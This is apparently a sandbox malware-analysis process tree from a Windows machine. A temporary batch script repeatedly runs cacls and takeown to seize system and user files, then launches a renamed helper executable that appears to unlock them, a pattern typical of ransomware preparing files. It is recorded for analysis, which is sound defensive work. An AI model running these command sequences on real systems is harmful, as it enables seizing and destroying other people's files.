C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "KnownGameList.bin" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "KnownGameList.bin" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "settings.dat" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "settings.dat" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "device.png" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "device.png" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "background.png" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "background.png" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "overlay.png" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "overlay.png" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "settings.dat" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "settings.dat" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "watermark.png" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "watermark.png" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵
-
-
-
